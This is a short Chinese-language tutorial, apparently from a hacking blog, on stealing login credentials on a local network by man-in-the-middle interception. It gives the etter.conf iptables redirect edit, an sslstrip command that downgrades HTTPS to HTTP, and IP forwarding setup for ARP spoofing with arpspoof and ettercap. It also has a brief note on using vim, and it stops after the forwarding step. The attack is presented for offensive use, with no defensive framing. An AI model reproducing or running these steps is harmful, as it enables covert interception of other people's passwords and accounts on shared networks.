内网称霸之《HTTPS账号密码获取》
⭐使用工具:arpspoof、ettercap、sslstrip
一、将HTTPS转换成HTTP
在获取HTTPS账号、密码的操作前需要修改ettercap的设置,否则无法成功。 1.先编辑/etc/ettercap/etter.conf下的文件内容,更改ettercap设置; 1.1输入/etc/ettercap/etter.conf后找到: # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 这个地方 2.改为(去掉两个#): # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 3.输入sslstrip -a -f -k 实现https转换成http以获取帐号密码; 4.在该终端窗口下右键选择“复制SSH渠道(S)”; 5.接着直接使用HTTP账号密码获取的方法就可以了。 |
vim使用方法:
编辑:按下i;
保存并退出:按下Esc,然后按Shift和:(冒号),按下wq,完后按回车;
不保存并退出:按下Esc,然后按Shift和:(冒号),按下q!,完后按回车;
1 | vim /etc/ettercap/etter.conf |
二、ARP欺骗和抓包获取HTTPS账号和密码
1 | echo 1 >/proc/sys/net/ipv4/ip_forward |